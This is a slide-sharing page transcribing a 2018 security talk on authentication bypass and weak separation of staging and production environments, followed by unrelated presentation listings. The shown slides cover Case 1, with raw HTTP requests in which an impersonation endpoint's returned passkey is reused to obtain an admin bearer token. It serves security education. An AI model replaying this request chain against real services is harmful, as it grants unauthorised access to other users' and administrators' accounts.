knocking down the big door
play

Knocking Down the Big Door Breaking Authentication and Segregation - PowerPoint PPT Presentation

Mar 01, 2023 •115 likes •961 views

Knocking Down the Big Door Breaking Authentication and Segregation of Production and Non-Production Environments Nahuel Grisola Cinta Infinita, Founder / CEO @cintainfinita Buenos Aires, 27 de Abril 2018 nahuel@cintainfinita.com.ar

  1. Knocking Down the Big Door Breaking Authentication and Segregation of Production and Non-Production Environments Nahuel Grisolía Cinta Infinita, Founder / CEO @cintainfinita 
 Buenos Aires, 27 de Abril 2018 nahuel@cintainfinita.com.ar

  2. § Cinta Infinita Founder and CEO § (Web) Application Security specialist & enthusiast § Many vulnerabilities discovered in Open Source and Commercial software: Vmware, Websense, OSSIM, Cacti, McAfee, OracleVM, etc. § Gadgets and Electronics Lover (RFID!) § http://ar.linkedin.com/in/nahuelgrisolia § http://cintainfinita.com § http://www.exploit-db.com/author/?a=2008 § http://www.proxmark.org/forum/profile.php?id=3000

  3. MOTIVATION “The Purpose of Education” - Enlightenment Sense “The highest goal in life is to inquire and create” “Education is really aimed at helping students get to the point where they can learn on their own” “It’s you the learner who is going to achieve in the course of education and it’s really up to you to determine how you’re going to master and use it.” - Noam Chomsky

  4. MOTIVATION “The Purpose of Education” - Enlightenment Sense “The highest goal in life is to inquire and create” “Education is really aimed at helping students get to the point where they can learn on their own” “It’s you the learner who is going to achieve in the course of education and it’s really up to you to determine how you’re going to master and use it.” - Noam Chomsky

  5. MOTIVATION “The Purpose of Education” - Enlightenment Sense “The highest goal in life is to inquire and create” “Education is really aimed at helping students get to the point where they can learn on their own” “It’s you the learner who is going to achieve in the course of education and it’s really up to you to determine how you’re going to master and use it.” - Noam Chomsky

  8. Introduction (boring but necessary)

  9. Introduction (boring but necessary) Case 1: Be careful while impersonating users . Seriously

  10. Introduction (boring but necessary) Case 1: Be careful while impersonating users . Seriously Case 2: Authentication Bypass vulnerability in the Auth0 platform

  11. Introduction (boring but necessary) Case 1: Be careful while impersonating users . Seriously Case 2: Authentication Bypass vulnerability in the Auth0 platform Case 3: Observations in MS Azure and IIS installations running .NET Web Applications using SAML Authentication Machine Keys ? Is that a new rock band?

  12. Introduction (boring but necessary) Case 1: Be careful while impersonating users . Seriously Case 2: Authentication Bypass vulnerability in the Auth0 platform Case 3: Observations in MS Azure and IIS installations running .NET Web Applications using SAML Authentication Machine Keys ? Is that a new rock band? Final Conclusions & Recommendations

  13. Introduction (boring but necessary) Case 1: Be careful while impersonating users . Seriously Case 2: Authentication Bypass vulnerability in the Auth0 platform Case 3: Observations in MS Azure and IIS installations running .NET Web Applications using SAML Authentication Machine Keys ? Is that a new rock band? Final Conclusions & Recommendations

  15. Authentication (AuthN) Restrictions on Who (or What) can Access a System

  16. Authentication (AuthN) Restrictions on Who (or What) can Access a System Authorization (AuthZ) Restrictions on Actions of Authenticated Users

  17. We usually Pentest in 
 Staging / Development Environments Full Isolation / Complete Segregation between Environments? Shared Secrets? Which secrets exactly? Shared Databases? 


  18. We usually Pentest in 
 Staging / Development Environments Full Isolation / Complete Segregation between Environments? Shared Secrets? Which secrets exactly? Shared Databases? 


  19. Federated Identity pattern “Delegate authentication to an external identity provider” https://docs.microsoft.com/en-us/azure/architecture/patterns/federated-identity

  20. https://jwt.io

  21. Security Assertion Markup Language ( SAML ) “XML-based framework for communicating user authentication, entitlement, and attribute information” Signed Audience And more…

  25. Case Number One (1/3) User Impersonation

  26. Case Number One (1/3) User Impersonation Usually only for Super Users or Full Site Administrators

  27. Case Number One (1/3) User Impersonation Usually only for Super Users or Full Site Administrators

  28. Case Number One (1/3) User Impersonation Usually only for Super Users or Full Site Administrators No password reset (or password sharing ;-) is

  29. Case Number One (1/3) User Impersonation Usually only for Super Users or Full Site Administrators No password reset (or password sharing ;-) is required to “act” as the target user

  30. Case Number One (1/3) User Impersonation Usually only for Super Users or Full Site Administrators No password reset (or password sharing ;-) is required to “act” as the target user

  31. Case Number One (1/3) User Impersonation Usually only for Super Users or Full Site Administrators No password reset (or password sharing ;-) is required to “act” as the target user Very sensitive functionality (Broken Authorization?)

  32. Case Number One (1/3) User Impersonation Usually only for Super Users or Full Site Administrators No password reset (or password sharing ;-) is required to “act” as the target user Very sensitive functionality (Broken Authorization?)

  33. Case Number One (1/3) User Impersonation Usually only for Super Users or Full Site Administrators No password reset (or password sharing ;-) is required to “act” as the target user Very sensitive functionality (Broken Authorization?) No “common strategy”

  34. Case Number One (2/3) User Impersonation

  35. Case Number One (2/3) User Impersonation Request: POST /api/user/1753/impersonate HTTP1.1 Host: test .crazy.net […] Response: HTTP/1.1 200 OK Server: Microsoft-IIS/8.5 Date: Tue, 16 Jan 2018 15:28:17 GMT Connection: close Content-Length: 245 {“username":"1753_user","passkey":"OMRDSPWTM 2X6KNM3KYHINET6MHL3XHNLYORN3VOK7EFJBFWXHX54H FLQRF7XSVEGOJGZ6G4YHTMPNEBTKKIEGLSC4WUCTVDV[ redacted]"}

  36. Case Number One (2/3) User Impersonation Request II: Request: POST /api/authentication/token HTTP/1.1 POST /api/user/1753/impersonate HTTP1.1 Host: test .crazy.net Host: test .crazy.net […] […]grant_type=password&username= admin &passw ord=OMRDSPWTM2X6KNM3KYHINET6MHL3XHNLYORN3VO Response: K7EFJBFWXHX54HFLQRF7XSVEGOJGZ6G4YHTMPNEBTKK HTTP/1.1 200 OK IEGLSC4WUCTVDV[redacted] Server: Microsoft-IIS/8.5 Date: Tue, 16 Jan 2018 15:28:17 GMT Response II: Connection: close HTTP/1.1 200 OK Content-Length: 245 Server: Microsoft-IIS/8.5 Date: Tue, 16 Jan 2018 15:31:12 GMT {“username":"1753_user","passkey":"OMRDSPWTM Connection: close 2X6KNM3KYHINET6MHL3XHNLYORN3VOK7EFJBFWXHX54H Content-Length: 1169 FLQRF7XSVEGOJGZ6G4YHTMPNEBTKKIEGLSC4WUCTVDV[ redacted]"} {"access_token":"dxjPlvTBeSg9ztuzMq8Ja_FKcg NaSV-SVHCt49OXxL2FOkALjeD- Aq3dOEH4fnOgADjfiHgmmOsChuAkXY2OQbrlUnZfotf KePcLhcY8BJxcJukPlHuJCwtUo6kj_7IR81- MQ4cbOARDG9N81FUaP45VHcYxexLGS8JMzEscPJBe[r edacted] ","token_type":"bearer","expires_in": 1209599,"userName":"admin",".issued":"Tue, 16 Jan 2018 15:31:12 GMT",".expires":"Tue, 30 Jan 2018 15:31:12 GMT"}

  37. Case Number One (2/3) User Impersonation Request II: Request: POST /api/authentication/token HTTP/1.1 POST /api/user/1753/impersonate HTTP1.1 Host: test .crazy.net Host: test .crazy.net […] […]grant_type=password&username= admin &passw ord=OMRDSPWTM2X6KNM3KYHINET6MHL3XHNLYORN3VO Response: K7EFJBFWXHX54HFLQRF7XSVEGOJGZ6G4YHTMPNEBTKK HTTP/1.1 200 OK IEGLSC4WUCTVDV[redacted] OK, this is bad, but… Server: Microsoft-IIS/8.5 Date: Tue, 16 Jan 2018 15:28:17 GMT Response II: Connection: close HTTP/1.1 200 OK Content-Length: 245 Server: Microsoft-IIS/8.5 Date: Tue, 16 Jan 2018 15:31:12 GMT {“username":"1753_user","passkey":"OMRDSPWTM Connection: close 2X6KNM3KYHINET6MHL3XHNLYORN3VOK7EFJBFWXHX54H Content-Length: 1169 FLQRF7XSVEGOJGZ6G4YHTMPNEBTKKIEGLSC4WUCTVDV[ redacted]"} {"access_token":"dxjPlvTBeSg9ztuzMq8Ja_FKcg NaSV-SVHCt49OXxL2FOkALjeD- Aq3dOEH4fnOgADjfiHgmmOsChuAkXY2OQbrlUnZfotf KePcLhcY8BJxcJukPlHuJCwtUo6kj_7IR81- MQ4cbOARDG9N81FUaP45VHcYxexLGS8JMzEscPJBe[r edacted] ","token_type":"bearer","expires_in": 1209599,"userName":"admin",".issued":"Tue, 16 Jan 2018 15:31:12 GMT",".expires":"Tue, 30 Jan 2018 15:31:12 GMT"}

Recommend

High School Graduate Trends WICHEs Knocking at the College Door Projections of High School

High School Graduate Trends WICHEs Knocking at the College Door Projections of High School

High School Graduate Trends WICHEs Knocking at the College Door Projections of High School Graduates, 9 th Ed. Peace Bransberger / knocking.wiche.edu #NACAC17 Fewer Grads in Total; More non-White Grads #NACAC17 Projected number compared to

1.14k views • 86 slides
Knocking The Rust Off Or Why Its Such A Great Time To Come Back To Flying! New Shiny Plastic

Knocking The Rust Off Or Why Its Such A Great Time To Come Back To Flying! New Shiny Plastic

What we will cover today What it takes to be PIC again What has changed since you last flew Prepare you for returning to the sky Airspace review Part 91 refresher Flight planning Staying active Knocking The

650 views • 19 slides
IMS Single Door Enclosures IMS Two Door Enclosures IMS Single Door with Slave Door

IMS Single Door Enclosures IMS Two Door Enclosures IMS Single Door with Slave Door

IMS Single Door Enclosures IMS Two Door Enclosures IMS Single Door with Slave Door Disconnect IMS Two Door with Slave Door Disconnect Plinth Bases with Black Textured Finish Galvanized Sub-Panels Galvanized Filler Plates

302 views • 29 slides
The Invisible Door Keeper Q-Door is an innovative door sensor. In Armed Mode setting, it sends an

The Invisible Door Keeper Q-Door is an innovative door sensor. In Armed Mode setting, it sends an

The Invisible Door Keeper Q-Door is an innovative door sensor. In Armed Mode setting, it sends an alarm whenever a door or a window is opened. Additionally, it detects change in humidity , temperature and light and visualizes them on the online

479 views • 11 slides
When the EEOC Comes Knocking Anticipating and Responding to Discrimination and Retaliation

When the EEOC Comes Knocking Anticipating and Responding to Discrimination and Retaliation

Presenting a live 90 minute webinar with interactive Q&A When the EEOC Comes Knocking Anticipating and Responding to Discrimination and Retaliation Investigations THURS DAY, JULY 21, 2011 1pm Eastern | 12pm Central | 11am

877 views • 60 slides
Effective G Get out t the Vot ote S Str trategie ies Direct voter contact is key to

Effective G Get out t the Vot ote S Str trategie ies Direct voter contact is key to

Effective G Get out t the Vot ote S Str trategie ies Direct voter contact is key to voter turnout especially young people and first-timer voters Get Out The Typical methods: door knocking, mailing, phone banking , texting,

331 views • 15 slides
Fr ont-door Versus Back-door Adjustment with Unmeasured Confounding: Bias Formulas for Front-door

Fr ont-door Versus Back-door Adjustment with Unmeasured Confounding: Bias Formulas for Front-door

Motivation Illustrative Example: ATT with One-Sided Noncompliance Application: JTPA Fr ont-door Versus Back-door Adjustment with Unmeasured Confounding: Bias Formulas for Front-door and Hybrid Adjustments 1 Adam Glynn and Konstantin Kashin

928 views • 53 slides
DEBRA Members Weekend 2017 EB therapy research in Dundee: an update Knocking out the faulty

DEBRA Members Weekend 2017 EB therapy research in Dundee: an update Knocking out the faulty

DEBRA Members Weekend 2017 EB therapy research in Dundee: an update Knocking out the faulty gene & Skipping the faulty exon Peter van den Akker Premium sponsors: EB therapy research in Dundee: an update Knocking out the faulty gene

794 views • 43 slides
Collabora(ve Media Package October, 2013 Opportunity Knocking

Collabora(ve Media Package October, 2013 Opportunity Knocking

Collabora(ve Media Package October, 2013 Opportunity Knocking What if the Educa(onal Publisher could build a ecosystem around each of their EPUB

298 views • 11 slides
My front door.. 1 2 My front door .. is the vehicle for communication and engagement with

My front door.. 1 2 My front door .. is the vehicle for communication and engagement with

My front door.. 1 2 My front door .. is the vehicle for communication and engagement with all our key stakeholders. o builds on the Learning Disability Strategy and Adult Social Care Vision ensuring the information is o accessible and

432 views • 8 slides
Overview of 2019 AECOM Door County Housing Study Presentation to the Door County Board of

Overview of 2019 AECOM Door County Housing Study Presentation to the Door County Board of

Overview of 2019 AECOM Door County Housing Study Presentation to the Door County Board of Supervisors February 26, 2019 Mariah Goode Background: Housing Efforts in Door County PAST AND ON-GOING WORK Door County Economic Development

416 views • 18 slides
Victory Fire Door Inspections Vickie Evans, FDAI Over 30 years in door and hardware

Victory Fire Door Inspections Vickie Evans, FDAI Over 30 years in door and hardware

Victory Fire Door Inspections Vickie Evans, FDAI Over 30 years in door and hardware industry DHI instructor and Education Advocate Certified Fire Door Inspector Victory Fire Door Inspections To compartmentalize a building

936 views • 75 slides
Response Prompting See school door. Open door and walk through. See boss or fellow employee

Response Prompting See school door. Open door and walk through. See boss or fellow employee

2/24/2017 Stimulus and Response Remember that every behavior is preceded by a stimulus and followed by a consequence. Stimulus Response Bus stops, driver opens door, people Get out of the bus. get up. Response Prompting See school door.

365 views • 4 slides
Knocking out the Supply and Sorting in Decentralized Job Markets Guillaume Haeringer

Knocking out the Supply and Sorting in Decentralized Job Markets Guillaume Haeringer

Knocking out the Supply and Sorting in Decentralized Job Markets Guillaume Haeringer Universitat Aut` onoma de Barcelona Vincent Iehl e Universit e Paris Dauphine N uria Rodriguez-Planas Universitat Aut` onoma de Barcelona

523 views • 33 slides
Discovery in Western Victoria ( and Queensland, and Tasmania) Read Corporate Resources Rising

Discovery in Western Victoria ( and Queensland, and Tasmania) Read Corporate Resources Rising

For personal use only Knocking on the Door to Discovery in Western Victoria ( and Queensland, and Tasmania) Read Corporate Resources Rising Stars Summer Series 2019 STAVELY MINERALS For personal use only Disclaimer This presentation contains

573 views • 41 slides
Securi-Door ESE 205 Clayton Keating and Savannah Rush Have you ever forgotten if youve

Securi-Door ESE 205 Clayton Keating and Savannah Rush Have you ever forgotten if youve

Securi-Door ESE 205 Clayton Keating and Savannah Rush Have you ever forgotten if youve locked your door? Securi-Door users will: Be able to log on to our website Remotely capture an image and see who is at their door On the

211 views • 7 slides
CF 68 FOLDING DOOR TOGETHER FOR BETTER 1 CF 68 Folding door Subject of the launch CF 68

CF 68 FOLDING DOOR TOGETHER FOR BETTER 1 CF 68 Folding door Subject of the launch CF 68

CF 68 FOLDING DOOR TOGETHER FOR BETTER 1 CF 68 Folding door Subject of the launch CF 68 Adjustable side profile CF 68-AP CF 68-HI Content Subject of the launch Context Concept Business Technical information

479 views • 36 slides
Extended Example (Iterative Refinement) A maze consists of rooms and doors: An door is either

Extended Example (Iterative Refinement) A maze consists of rooms and doors: An door is either

Extended Example (Iterative Refinement) A maze consists of rooms and doors: An door is either a door into a room an escape to a particular place A room has two doors, left and right 1 Door Data Definition abstract class Door { }

254 views • 11 slides
DECREASING DOOR -IN DOOR- OUT TIMES (DIDO) ANGELIQUA POCHERT MS 1 , ERIN EKSTROM RN BSN

DECREASING DOOR -IN DOOR- OUT TIMES (DIDO) ANGELIQUA POCHERT MS 1 , ERIN EKSTROM RN BSN

IMPROVING TELESTROKE CARE: DECREASING DOOR -IN DOOR- OUT TIMES (DIDO) ANGELIQUA POCHERT MS 1 , ERIN EKSTROM RN BSN MBA 1 , JALEEN SMITH BS, 1 LEE CHUNG MD, 1,2 PETER HANNON MD, 1,2 AND JENNIFER J. MAJERSIK MD, MS 1,2 STROKE CENTER; 1

628 views • 17 slides
Big Data Analytics for Passenger Centric ATM Understanding Door to Door Travel Times

Big Data Analytics for Passenger Centric ATM Understanding Door to Door Travel Times

Big Data Analytics for Passenger Centric ATM Understanding Door to Door Travel Times from Opportunistically Collected Mobile Phone Records Pedro Garca Albertos Data Scientist, Nommon Solutions and Technologies Belgrade 29 th of

721 views • 22 slides
Robo Door Introduction Robo Door has been manufacturing their own products since 1995, and

Robo Door Introduction Robo Door has been manufacturing their own products since 1995, and

Trellis Security Doors Robo Door Introduction Robo Door has been manufacturing their own products since 1995, and currently offers a variety of products and services. Our products are distributed national and internationally by our own sales

259 views • 13 slides
Logic and Reasoning R&N 7-9 Room 1 Room 2 Door 1 Door 2 Observed facts: Door1Open AND

Logic and Reasoning R&N 7-9 Room 1 Room 2 Door 1 Door 2 Observed facts: Door1Open AND

Logic and Reasoning R&N 7-9 Room 1 Room 2 Door 1 Door 2 Observed facts: Door1Open AND Door2Open Door 3 Prior Knowledge: Room 3 Room 4 Door1Open AND Door2Open AND Door3Open Knowledge Base (KB) IMPLIES Path Room1 to Room4 Query:

572 views • 20 slides
Connecting the world to your door Jonkoping Service Competitive ONE WAY DOOR solutions to

Connecting the world to your door Jonkoping Service Competitive ONE WAY DOOR solutions to

Connecting the world to your door Jonkoping Service Competitive ONE WAY DOOR solutions to Jonkoping area combining rail and truck Inland HUB - Jonkoping One way import Carrier Haulage Daily dept from Goteborg Port Overnight transport Rail +

423 views • 9 slides
OPEN DOOR GROUP PRESENTATION BY WILLIAM STEEL TAYLOR IN OUR OPEN DOOR GROUP WE HAVE BEEN

OPEN DOOR GROUP PRESENTATION BY WILLIAM STEEL TAYLOR IN OUR OPEN DOOR GROUP WE HAVE BEEN

OPEN DOOR GROUP PRESENTATION BY WILLIAM STEEL TAYLOR IN OUR OPEN DOOR GROUP WE HAVE BEEN DISCUSSING HATE & MATE CRIME. WORKING IN PARTNERSHIP WITH YORKSHIRE COAST HOMES LEAFLETS AND POSTERS HAVE BEEN GIVEN OUT IN THE TOWN CENTRE TO

659 views • 6 slides

More recommend